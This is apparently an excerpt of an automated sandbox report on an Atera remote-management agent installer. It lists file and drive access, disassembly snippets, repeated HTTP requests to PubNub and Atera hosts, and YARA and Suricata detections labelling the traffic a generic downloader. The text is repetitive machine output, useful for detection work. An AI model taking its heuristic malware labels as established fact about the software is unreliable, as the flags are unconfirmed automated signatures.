                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile opened: c:
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB451873h13_2_00007FFAAB45172D
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB451FFFh13_2_00007FFAAB451FAC
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB451A44h13_2_00007FFAAB451A34
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB461873h15_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB461A44h15_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB461FFFh15_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB46227Bh15_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB464ECBh15_2_00007FFAAB464C41
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB47B972h15_2_00007FFAAB47B5E7
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB464ECBh15_2_00007FFAAB464DC8
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB461FFFh15_2_00007FFAAB461EB6
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB47B972h15_2_00007FFAAB47B620
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB6861F3h15_2_00007FFAAB68609D
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB68681Eh15_2_00007FFAAB686765
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB686CFCh15_2_00007FFAAB686765
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax15_2_00007FFAAB686263

                              Networking

                              barindex
                              Yara detected Generic Downloader
                              Source: Yara matchFile source: 19.0.AgentPackageAgentInformation.exe.2ac4fe20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b619f5c8-c13b-4e86-88e3-ba75e0e2aa5f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b225017a-a518-407e-ba60-89916d0db242&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bf4acf61-3ccb-481c-8428-f2b8078e60c9&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ec94d306-e989-460d-a2a2-e676241f4153&tr=31&tt=17324433440942418&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=97a3c5c1-3b53-4697-9042-014f3710a368&tr=31&tt=17324433474018542&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=ad2d8efb-91cb-408c-a084-3f507796640e&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /agentpackagesnet45/AgentPackageAgentInformation/38.0/AgentPackageAgentInformation.zip?7eC/6UeVMT2yOja7rugNNkxRTCpJ1tREDX7f6JkZ3OlpG2NJMgnOjIB/dqEJPBcv HTTP/1.1Host: ps.atera.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=19414362-703b-464a-b6c7-07f45d92c533&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c6f3c309-b378-4eb6-be20-6f03325c221f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b22252c6-c37c-49ec-8023-03bf78fe353a&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3f74bb1-6c6f-4d46-bcd1-dababeae95b1&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9d2bb483-a1d5-41c5-b567-c3f48ab6ed2c&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=618f72e2-0dcf-4d40-b59c-d773fc1ae2ba&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=9cb19796-6c2e-41ce-9126-598ecc9d33d5&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bb33ca5-3446-47a7-8747-dbbe274b3fa8&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=fe727902-1ef3-4552-afad-6178afa6c12c&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2a252f8a-196a-412e-bfc9-292322230586&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=4097a231-6804-42b7-a1c1-b63735fd2c43&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f5557641-16d5-42d0-befc-2c3fa49ec144&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=28392dc4-8934-4e46-983c-9a044d541e87&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5b5ff814-67d7-4f31-988a-3021f6dcca17&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bdd8f068-e461-49d2-bf76-5496f217f86a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=101aac48-536c-4c37-8daf-2942910eb004&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=78d657fe-250a-4458-990e-8db1804a62a6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c2794a63-4cce-452a-a323-b26bf4d17cfd&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3a79d35f-3aae-426f-91c8-7d16143c1d7a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ebb1f16f-c11d-4880-8816-8b8ea69a0ee1&tr=31&tt=17324434182234301&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f3cbab58-b709-46f1-9320-2a47ceb98572&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=7cbe7b17-7f3f-4c8d-9d62-c19102ed6fde&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=e037a3ed-5082-482a-83de-1fb0a079a164&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5c21410a-40ef-453f-8c5e-f80e3c3a9e9b&tr=31&tt=17324434351531129&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=03f53b61-ad6b-486d-8509-b0e195faf765&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ce&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=326c90ae-c5b0-4a74-aa79-71ed3289b5e6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=1be45d8e-3b2c-4ea5-a5b7-07647d59b850&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=50d6fee0-b13e-4824-8baa-cb59cf186680&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=a0a85a46-f9d7-4b43-9103-c66ecd6f79b0&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49779 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49900 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49952 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49931 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49971 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49980 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49793 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50066 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50083 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50034 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50009 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50053 -> 13.232.67.198:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50078 -> 13.232.67.198:443
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b619f5c8-c13b-4e86-88e3-ba75e0e2aa5f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b225017a-a518-407e-ba60-89916d0db242&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bf4acf61-3ccb-481c-8428-f2b8078e60c9&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ec94d306-e989-460d-a2a2-e676241f4153&tr=31&tt=17324433440942418&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=97a3c5c1-3b53-4697-9042-014f3710a368&tr=31&tt=17324433474018542&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=ad2d8efb-91cb-408c-a084-3f507796640e&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /agentpackagesnet45/AgentPackageAgentInformation/38.0/AgentPackageAgentInformation.zip?7eC/6UeVMT2yOja7rugNNkxRTCpJ1tREDX7f6JkZ3OlpG2NJMgnOjIB/dqEJPBcv HTTP/1.1Host: ps.atera.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=19414362-703b-464a-b6c7-07f45d92c533&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c6f3c309-b378-4eb6-be20-6f03325c221f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b22252c6-c37c-49ec-8023-03bf78fe353a&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3f74bb1-6c6f-4d46-bcd1-dababeae95b1&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9d2bb483-a1d5-41c5-b567-c3f48ab6ed2c&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=618f72e2-0dcf-4d40-b59c-d773fc1ae2ba&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=9cb19796-6c2e-41ce-9126-598ecc9d33d5&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bb33ca5-3446-47a7-8747-dbbe274b3fa8&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=fe727902-1ef3-4552-afad-6178afa6c12c&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2a252f8a-196a-412e-bfc9-292322230586&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=4097a231-6804-42b7-a1c1-b63735fd2c43&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f5557641-16d5-42d0-befc-2c3fa49ec144&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=28392dc4-8934-4e46-983c-9a044d541e87&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
